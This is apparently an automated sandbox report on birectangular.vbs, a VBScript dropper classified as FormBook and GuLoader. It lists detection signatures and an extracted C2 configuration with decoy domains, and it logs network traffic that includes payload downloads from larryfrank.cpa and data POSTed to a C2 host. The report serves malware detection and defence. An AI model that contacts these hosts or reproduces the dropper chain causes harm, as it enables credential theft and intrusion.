Windows Analysis Report
birectangular.vbs

Overview

General Information

Sample name: birectangular.vbs
Analysis ID: 1466597
MD5: be6f44242b4afd0e61d775b9ef7946b0
SHA1: 80ce71becc7fb1203a43708d7e3fdcad778bb79e
SHA256: 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
Tags: vbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.x6hk8.com/dd01/"], "decoy": ["1prostitutki-chelyabinska.com", "o2v7c.rest", "something-organized.com", "etc99.store", "perksaccess.contact", "consuyt.xyz", "dscmodelpapers.com", "dana88.lat", "dumange.com", "pointlomabarreboutique.com", "djtmaga.net", "dentisttanger.com", "17251604.com", "dogcatshoponline.com", "eppgrandeur.com", "jyty3500.com", "felixkang.asia", "xn--22ck2ci1dl0f7b7h.com", "milliesrecruitment.com", "www333804000.com", "g90luv.vip", "glamourverde.store", "tzbgs.com", "alpha-wealth.club", "homestreamztv.com", "alignedinvestment.com", "ragwash.com", "ultrakan.xyz", "clearconceptslearning.com", "explorewithnor.com", "d-b-d.com", "saltdrink.com", "55957462.com", "limbicmindset.com", "baldomerotienda.com", "yh-9.xyz", "easyskinz.xyz", "lovefulmindfulness.com", "030303-11122222.cloud", "sunpulse.store", "rescapital.world", "payizadlt.com", "cindcxyshirts.shop", "vnddq.biz", "pvywgx235i.top", "www708cc.vip", "poa88koi.lol", "aseasyas1234inc.net", "ygudk.biz", "tmdirtbikes.com", "bqzprvkljhwtmnxy.net", "qk09.top", "aiatlant.com", "zayinvest.com", "intermediafx.com", "lemonlight.fun", "eurovisfilo.com", "bluefrazer.com", "835000suns.com", "checkonly.net", "bs2bestat.net", "praywithus.space", "huafu.site", "radleyhealth.com"]}
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free, 25_2_00C90115
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FD30 CryptExportKey,GetLastError,malloc,CryptExportKey,GetLastError,free, 25_2_00C8FD30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8DAFB CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 25_2_00C8DAFB
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FA58 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGenKey,GetLastError,GetLastError, 25_2_00C8FA58
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FE35 CryptBinaryToStringW,GetLastError,malloc,CryptBinaryToStringW,GetLastError,free,SysFreeString, 25_2_00C8FE35
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString, 25_2_00C90383
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8FF58 CryptStringToBinaryW,GetLastError,malloc,CryptStringToBinaryW,GetLastError, 25_2_00C8FF58
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
Source: Binary string: RAServer.pdb source: raserver.exe
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\raserver.exe Code function: 4x nop then pop edi 25_2_001E6CD2

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49708 -> 46.23.69.44:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.x6hk8.com/dd01/
Performs DNS queries to domains with low reputation
Source: DNS query: www.yh-9.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1Host: www.alignedinvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.23.69.44 46.23.69.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UK2NET-ASGB UK2NET-ASGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 22_2_0B313F82 getaddrinfo,setsockopt,recv, 22_2_0B313F82
Source: global traffic HTTP traffic detected: GET /Negus85.csv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xdKCjAMEQDWiUiQMPQ170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: larryfrank.cpaCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g== HTTP/1.1Host: www.alignedinvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic DNS traffic detected: DNS query: larryfrank.cpa
Source: global traffic DNS traffic detected: DNS query: www.alignedinvestment.com
Source: global traffic DNS traffic detected: DNS query: www.yh-9.xyz
Source: unknown HTTP traffic detected: POST /dd01/ HTTP/1.1Host: www.alignedinvestment.comConnection: closeContent-Length: 144589Cache-Control: no-cacheOrigin: http://www.alignedinvestment.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.alignedinvestment.com/dd01/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 36 41 3d 4f 6d 76 78 46 53 6d 56 78 64 4e 57 36 4b 35 4a 68 7a 6a 72 35 5a 31 2d 67 76 7e 67 79 37 78 50 42 32 31 50 55 4a 43 4c 79 76 6f 78 4c 6b 4e 79 6c 63 57 5f 6f 6c 33 4a 38 35 59 41 6b 6e 49 44 53 5f 64 65 72 4c 73 6b 7e 75 74 51 50 6b 35 42 49 4c 76 68 62 67 4b 46 42 59 28 38 79 47 55 57 53 2d 7a 68 30 34 6d 31 43 67 54 50 34 32 48 71 53 50 6a 4b 69 35 33 44 73 66 63 77 39 69 51 33 6c 56 39 4d 4c 36 46 6c 49 36 69 37 49 6a 32 6c 67 56 75 67 55 46 43 6b 47 5a 31 38 58 33 78 73 53 61 4d 6a 52 57 37 42 31 4f 32 78 30 38 50 39 76 32 7e 43 48 6b 72 63 4d 4a 4b 6d 6a 68 76 4e 31 57 59 48 56 46 53 72 45 64 6b 2d 33 30 69 7a 7a 64 71 71 6d 5a 34 44 48 52 53 48 69 46 43 75 74 4c 43 7a 50 6a 56 47 78 6b 68 58 49 5a 28 5f 55 2d 51 5f 75 4c 47 43 38 68 76 34 33 61 6a 68 54 64 34 30 71 4b 6d 38 69 50 28 4a 33 68 4f 4b 45 5f 41 67 56 79 62 4f 4b 71 39 65 6c 34 51 50 36 51 39 48 52 4c 77 6d 55 4d 66 6b 6c 5a 28 6b 58 45 64 51 35 50 73 30 4f 33 42 35 74 65 31 45 75 34 6d 39 33 47 66 35 35 34 48 45 37 6b 39 5a 39 63 28 79 7e 4d 42 67 45 46 49 44 48 53 42 42 4c 4e 30 63 69 56 79 4d 75 4d 6c 63 5a 78 66 6b 62 75 28 51 35 5a 53 43 4c 44 68 78 4e 6a 4c 53 79 6a 7e 63 39 76 4b 33 67 43 71 55 69 50 6a 66 7e 31 69 6a 73 63 33 64 38 36 62 49 76 68 48 31 49 45 4e 64 46 5f 33 73 73 36 77 73 66 59 36 78 36 64 52 61 55 42 51 49 30 72 64 2d 51 31 75 31 6f 47 69 54 4d 56 28 50 46 77 55 66 6e 75 33 75 4f 77 39 53 4a 30 54 34 4d 32 77 74 67 6e 66 31 4b 67 6b 57 42 33 4a 63 6f 59 45 41 70 58 34 31 30 75 41 6b 78 42 43 47 4b 4b 33 50 59 79 51 46 65 38 31 63 78 46 6e 6e 76 4d 54 41 68 42 57 66 4a 5f 59 6a 58 32 46 4c 52 51 42 63 56 2d 52 50 5a 42 65 57 6a 42 52 6c 52 6d 70 35 58 4f 4f 6d 6e 4a 66 61 6d 79 33 68 30 70 45 64 49 7a 52 65 5a 32 68 6a 58 62 71 4a 28 5a 39 4e 77 52 65 42 6b 42 44 44 65 48 54 72 4f 43 4e 67 35 6b 73 68 44 30 66 56 41 68 5a 4e 4c 2d 71 68 73 72 68 7a 7a 74 45 4f 30 61 54 6e 64 57 56 37 64 79 4b 6d 56 62 38 35 4f 4d 28 58 47 4c 48 62 47 6f 54 65 35 66 6c 39 76 77 52 4e 61 52 4d 35 46 41 5a 58 68 64 42 48 31 31 4c 59 52 33 42 49 6d 48 57 6a 61 4b 28 5a 28 6b 4e 75 6f 33 42 50 7e 5f 62 59 73 44 52 54 78 61 53 65 33 52 77 55 4f 38 69 5a 51 56 61 4b 32 2d 70 62 63 4b 70 57 6e 5a 51 57 74 51 69 47 73 78 43 6c 36 48 79 70 44 41 6f 6e 43 70 46 6d 41 6c 69 31 4b 71 75 35 6e 5a 4f 31 56 72 36 47 68 6f 53 49 73 5a 35 39 61 34 34 5a 49 56 72 49 49 75 41 68 61 63 75 44 71 57 58 56 59 30 79 55 6d 53 43 75 7e 35 7e 33 30 79 4c 61 33 6b 66 2d 66 4c 70 5a 69 70 4c 48 73 43 73 79 69 52 70 78 55 71 50 4e 61 44 32 69 7e 53 59 65 31 79 42 38 44
Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsh
Source: wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1371449760.0000020477690000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1369707931.0000020475128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.0000020475129000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1244435885.000002047770E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244926036.0000020477736000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad6f7
Source: wscript.exe, 00000000.00000003.1244762105.00000204776EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244638102.00000204776C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1336ccf7ad
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C72C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://larryfrank.cpa
Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.c
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cp
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/N
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Ne
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Neg
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negu
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus8
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.c
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.cs
Source: powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.csv
Source: powershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://larryfrank.cpa/Negus85.csvXR
Source: powershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.128.157.150:443 -> 192.168.2.7:49707 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90115 SysStringLen,CryptDestroyKey,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SysStringLen,SysStringLen,CryptImportKey,free,SysStringLen,CryptDecrypt,SysAllocStringByteLen,SysFreeString,free, 25_2_00C90115
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C90383 __EH_prolog3_GS,SysStringLen,CryptImportKey,GetLastError,CryptGenKey,GetLastError,CryptEncrypt,GetLastError,free,malloc,memset,memcpy,CryptEncrypt,GetLastError,free,SysFreeString,SysFreeString,CryptDestroyKey,CryptDestroyKey,SysFreeString, 25_2_00C90383

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\raserver.exe Dropped file: C:\Users\user\AppData\Roaming\834O80R0\834logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\raserver.exe Dropped file: C:\Users\user\AppData\Roaming\834O80R0\834logrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: amsi32_7748.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Mythopoet.ShellExecute akademiseringerne,Kritrima,"","" ,Sennesblgenes
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6618
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6618 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6618 Jump to behavior
Writes or reads registry keys via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
